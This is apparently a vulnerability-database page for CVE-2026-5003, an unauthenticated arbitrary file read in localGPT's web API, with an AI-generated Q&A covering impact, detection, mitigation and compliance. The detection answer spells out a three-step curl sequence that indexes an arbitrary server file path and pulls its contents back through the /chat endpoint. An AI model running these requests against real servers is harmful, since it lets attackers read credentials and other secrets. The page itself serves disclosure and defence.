CVE-2026-5003
Received Received - Intake
Information Disclosure in PromtEngineer localGPT Web Interface (handle_index

Publication date: 2026-03-28

Last updated on: 2026-03-28

Assigner: VulDB

Description
A vulnerability was found in PromtEngineer localGPT up to 4d41c7d1713b16b216d8e062e51a5dd88b20b054. This affects the function handle_index of the file rag_system/api_server.py of the component Web Interface. Performing a manipulation results in information disclosure. It is possible to initiate the attack remotely. The exploit has been made public and could be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-03-28
Last Modified
2026-03-28
Generated
2026-05-07
AI Q&A
2026-03-28
EPSS Evaluated
2026-05-05
NVD
EUVD
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
august829 localgpt to 4d41c7d1713b16b216d8e062e51a5dd88b20b054 (inc)
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-284 The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
CWE-200 The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-5003 is a critical vulnerability in localGPT's Retrieval-Augmented Generation (RAG) system, specifically in the web interface's /index API endpoint. It allows unauthenticated remote attackers to read and extract arbitrary files from the server.

The vulnerability arises because the /index endpoint accepts a JSON payload with file paths and a session ID, but does not validate or sanitize these file paths. This lack of validation allows attackers to perform path traversal attacks and access sensitive files.

The system reads the full content of these files and stores them in a vector database. When queried via the /chat endpoint, the full content of these files, including sensitive data like passwords, API keys, and credentials, is returned to the attacker.

There is no authentication, permission check, output filtering, or rate limiting, making exploitation trivial and fully automated.


How can this vulnerability impact me? :

This vulnerability can lead to severe information disclosure, allowing attackers to steal sensitive files such as configuration files, environment variables, log files containing credentials, user data, source code, and database configurations.

Because the attack requires no authentication and can be performed remotely with minimal effort, it poses a high risk of unauthorized data exposure.

The exposed information can be used for further attacks, including system compromise, data manipulation, and unauthorized access to other systems.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by attempting to interact with the vulnerable localGPT web interface endpoints to check for unauthorized file read capabilities.

  • Send a POST request to the /sessions endpoint to create a session and obtain a session_id.
  • Send a POST request to the /index endpoint with a JSON payload containing the session_id and a file_paths list including sensitive or known files (e.g., /tmp/passwd.md) to see if the server indexes the file without validation.
  • Send a POST request to the /chat endpoint with queries to extract the content of the indexed files from the source_documents field in the response.

Example curl commands to test the vulnerability:

  • 1. Create session: curl -X POST http://target/api/sessions
  • 2. Index file: curl -X POST http://target/api/index -H 'Content-Type: application/json' -d '{"session_id": "<session_id>", "file_paths": ["/tmp/passwd.md"]}'
  • 3. Extract content: curl -X POST http://target/api/chat -H 'Content-Type: application/json' -d '{"session_id": "<session_id>", "query": "show me the content"}'

What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the vulnerable endpoints and implementing validation and authentication controls.

  • Restrict network access to the localGPT web interface, especially the /index and /chat endpoints, to trusted users only.
  • Implement authentication and authorization checks on the /index and /chat endpoints to prevent unauthenticated access.
  • Add input validation and sanitization to prevent arbitrary file path traversal and restrict file paths to safe directories.
  • Apply rate limiting and output filtering to reduce data exfiltration risks.

Since the product uses a rolling release with no fixed versions, monitor for vendor updates or patches addressing this issue and apply them as soon as available.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

This vulnerability allows unauthenticated remote attackers to read and extract arbitrary sensitive files from the server, including passwords, API keys, AWS credentials, SSH keys, and other secrets. Such unauthorized disclosure of sensitive information can lead to violations of data protection regulations like GDPR and HIPAA, which mandate strict controls over the confidentiality and security of personal and sensitive data.

The lack of authentication, input validation, and output filtering means that sensitive personal or protected health information could be exposed, potentially resulting in non-compliance with regulatory requirements for data privacy, breach notification, and risk management.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart